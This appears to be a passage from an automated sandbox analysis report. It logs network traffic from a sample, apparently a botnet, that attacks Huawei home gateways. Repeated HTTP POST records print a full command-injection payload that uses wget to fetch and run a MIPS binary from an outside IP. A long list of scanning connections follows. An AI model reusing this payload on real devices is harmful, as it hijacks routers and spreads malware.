20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 61.76.22.146
Source: unknown TCP traffic detected without corresponding DNS query: 23.228.252.146
Source: unknown TCP traffic detected without corresponding DNS query: 167.61.225.82
Source: unknown TCP traffic detected without corresponding DNS query: 196.7.75.56
Source: unknown TCP traffic detected without corresponding DNS query: 154.241.51.147
Source: unknown TCP traffic detected without corresponding DNS query: 23.29.188.234
Source: unknown TCP traffic detected without corresponding DNS query: 111.158.5.202
Source: unknown TCP traffic detected without corresponding DNS query: 141.229.33.152
Source: unknown TCP traffic detected without corresponding DNS query: 104.167.221.9
Source: unknown TCP traffic detected without corresponding DNS query: 74.62.72.251
Source: unknown TCP traffic detected without corresponding DNS query: 179.71.83.72
Source: unknown TCP traffic detected without corresponding DNS query: 128.117.4.49
Source: unknown TCP traffic detected without corresponding DNS query: 32.222.200.14
Source: unknown TCP traffic detected without corresponding DNS query: 5.153.241.51
Source: unknown TCP traffic detected without corresponding DNS query: 81.25.222.140
Source: unknown TCP traffic detected without corresponding DNS query: 180.213.193.141
Source: unknown TCP traffic detected without corresponding DNS query: 131.138.30.253
Source: unknown TCP traffic detected without corresponding DNS query: 170.217.232.94
Source: unknown TCP traffic detected without corresponding DNS query: 89.65.31.75
Source: unknown TCP traffic detected without corresponding DNS query: 32.82.143.80
Source: unknown TCP traffic detected without corresponding DNS query: 12.199.160.105
Source: unknown TCP traffic detected without corresponding DNS query: 1.30.206.40
Source: unknown TCP traffic detected without corresponding DNS query: 13.55.109.90
Source: unknown TCP traffic detected without corresponding DNS query: 41.229.254.231
Source: unknown TCP traffic detected without corresponding DNS query: 84.183.153.128
Source: unknown TCP traffic detected without corresponding DNS query: 113.183.96.66
Source: unknown TCP traffic detected without corresponding DNS query: 139.67.227.25
Source: unknown TCP traffic detected without corresponding DNS query: 66.68.24.116
Source: unknown TCP traffic detected without corresponding DNS query: 25.234.111.0
Source: unknown TCP traffic detected without corresponding DNS query: 208.217.82.85
Source: unknown TCP traffic detected without corresponding DNS query: 195.96.81.94
Source: unknown TCP traffic detected without corresponding DNS query: 81.254.39.16
Source: unknown TCP traffic detected without corresponding DNS query: 203.214.61.184
Source: unknown TCP traffic detected without corresponding DNS query: 97.97.170.115
Source: unknown TCP traffic detected without corresponding DNS query: 41.175.187.12
Source: unknown TCP traffic detected without corresponding DNS query: 148.123.144.137
Source: unknown TCP traffic detected without corresponding DNS query: 75.201.151.117
Source: unknown TCP traffic detected without corresponding DNS query: 153.163.26.129
Source: unknown TCP traffic detected without corresponding DNS query: 34.100.244.30
Source: unknown TCP traffic detected without corresponding DNS query: 153.118.148.66
Source: unknown TCP traffic detected without corresponding DNS query: 149.234.204.59
Source: unknown TCP traffic detected without corresponding DNS query: 204.8.69.100
Source: unknown TCP traffic detected without corresponding DNS query: 161.243.172.243
Source: unknown TCP traffic detected without corresponding DNS query: 154.95.1.133
Source: unknown TCP traffic detected without corresponding DNS query: 133.45.63.154
Source: unknown TCP traffic detected without corresponding DNS query: 132.217.68.209
Source: unknown TCP traffic detected without corresponding DNS query: 109.124.239.109
Source: unknown TCP traffic detected without corresponding DNS query: 170.26.252.76
Source: unknown TCP traffic detected without corresponding DNS query: 14.60.20.140
Source: unknown TCP traffic detected without corresponding DNS query: 98.196.19.248
